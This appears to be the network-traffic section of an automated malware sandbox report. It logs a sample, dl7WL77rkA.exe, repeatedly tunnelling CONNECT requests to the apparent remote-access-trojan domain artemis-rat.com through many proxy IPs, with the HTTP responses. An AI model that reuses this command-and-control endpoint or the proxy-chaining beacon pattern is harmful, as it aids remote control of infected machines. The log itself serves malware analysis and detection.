                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1182192.168.2.553149114.132.202.12580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.573857069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108999968 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1183192.168.2.553332172.67.255.224803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.581270933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.735474110 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1184192.168.2.551327103.200.135.22841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.581273079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1185192.168.2.553207219.73.88.167803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.582325935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.896959066 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1186192.168.2.552634162.214.170.144253473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.582688093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.701931953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702167034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702297926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1187192.168.2.551514162.214.191.209582753876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.583041906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.701976061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702183962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702297926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1188192.168.2.55322694.130.94.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.585061073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.893260956 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1189192.168.2.553109115.248.66.13131293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.591588974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.291887045 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1190192.168.2.553305162.241.79.22520483876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.595506907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.201685905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905181885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.202058077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1191192.168.2.553351185.162.229.70803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.599678993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.754149914 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192192.168.2.553213181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.599972010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1193192.168.2.553135103.49.202.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.600147009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.978923082 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1194192.168.2.55325638.7.204.1299993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.603795052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355046988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.311471939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124826908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811407089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.514434099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217190981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.556723118 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1195192.168.2.552711162.241.45.22505283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.603802919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.701980114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702183008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702301979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
